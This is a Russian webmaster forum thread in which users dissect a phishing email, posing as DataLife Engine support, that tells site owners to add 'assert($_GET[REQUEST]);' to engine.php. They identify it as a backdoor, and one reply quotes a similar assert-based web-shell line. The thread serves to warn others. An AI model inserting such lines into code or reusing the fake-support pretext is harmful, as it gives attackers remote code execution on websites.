Привет, форумчане. Давно я сюда не писал, но этот случай показался мне крайне забавным.
В общем встаю я с утра, вижу письмо отправленное через обратную связь на сайте. Типа от официальной службы поддержки DLE(!).
Вот само письмо:
Здравствуйте, уважаемый клиент!
Благодарим Вас за использование на Вашем сайте shlyahten.ru нашего ПО «CMS DataLife Engine - Система управления сайтами».
Уведомляем Вас о том, что силами наших специалистов на Вашем сайте была обнаружена критическая уязвимость, позволяющая злоумышленникам получить доступ к базе данных Вашего сайта из-за недостаточной фильтрации данных.
По нашим данным 60% сайтов, использующих «DataLife Engine», уязвимы и подвержены взлому посредством данной уязвимости. Именно по этой причине, мы приняли решение произвести рассылку администраторам уязвимых сайтов для того, чтобы они смогли оперативно обезопасить свои сайты от противоправных действий со стороны злоумышленников.
Для исправления уязвимости в текстовом редакторе откройте файл Вашего сайта: shlyahten.ru/engine/engine.php и в самое начало файла после строчки:
<?php
добавьте:
assert($_GET[REQUEST]);
С уважением,
Служба поддержки «DataLife Engine»
IP адрес отправителя: 199.27.128.202
Сначала я почти поверил. Да и думаю многие, кто не знает PHP поверят в это. Но потом, когда я уже начал просыпаться, я заметил что-то не ладное.
В тексте говорится о фильтрации. Но даже я понимаю, что данный код никакой фильтрации не производит. Так что считаю это бэкдором.
Ваши идеи?
19.10.2014 12:23- 0
- 19.10.2014 12:47Опытный
- Регистрация: 08.06.2011
- Сообщений: 342
- Репутация: 64
Банальный развод, подобные письма давно уже ходят.Aassert такой себе аналог exec, только не такой явный
- 0
- 19.10.2014 13:09
вы не один такой http://searchengines.guru/showthread.php?t=869369
- 0
- 19.10.2014 15:12Студент
- Регистрация: 10.10.2014
- Сообщений: 86
- Репутация: 5
Тоже такое пришло, причем на сайты с версиями ДЛЕ от 6 до 10. Выбирают автоматом сайты на этой ЦМС, и через стандартную форму, которая у всех на одном урле делают рассылку. Расчет на нубов.
- 0
- 19.10.2014 20:14
Lacoste, кто-нибудь может объяснить, что делает код? Он же вроде безобидный. Странный в общем.
- 0
- 19.10.2014 20:34
Код, который мы будем внедрять в tmp-файл:
<?php
assert(stripslashes($_REQUEST["e"]));
?>
С помощью PHP-сценария формируем POST-пакет для отправки файла с PHP-кодом:
Дальше не стоит думаю объяснять) Да, детская попытка взлома.- 0
- 20.10.2014 00:45
Rubilnik, на сколько я знаю, если Админы движка видят какие-либо уязвимости или недоработки, в той или иной версии - они оповещают об этом ВМ на оф сайте в определенной теме (в зависимости от версии движка) и пишут инструкции, как исправить эти ошибки... Если к вам приходят такие письма - лучше сразу на оф сайт. Если там нет подобного - лучше проигнорировать письмо.
- 0
Похожие темы
| Темы | Раздел | Ответов | Последний пост |
|---|---|---|---|
Уведомление о неудачных попытках входа[Попытка взлома?] | Обсуждение форума и ваши предложения | 53 | 06.04.2012 02:17 |
Попытка черного пиара!? | Оффтоп и свободные темы | 16 | 15.01.2012 16:51 |
Попытка взлома аккаунта на webmasters.ru | Оффтоп и свободные темы | 3 | 20.12.2011 14:15 |
Попытка развода или случайность? | Оффтоп и свободные темы | 31 | 30.09.2011 18:53 |
addurl adsense instagram proxy vkontakte wp-login youtube zennoposter аккаунт база бесплатный блог витрина вконтакт вопрос гемблинг гугл данный добавить домен запрос кейс ключ купить лицензия магазин можно накрутка новый отзыв парсер партнёрка плагин поинтовый пользователь порно портал продажа прокси работа работать регистрация сайт сеть скрипт создание софт ссылка статья стоимость тариф текст тема трафик услуга форум хотеть цель цена шаблон
Тем:
77,528Сообщений:
762,164Пользователей:
30,079Сейчас на сайте:
0 пользователей и 319 гостей
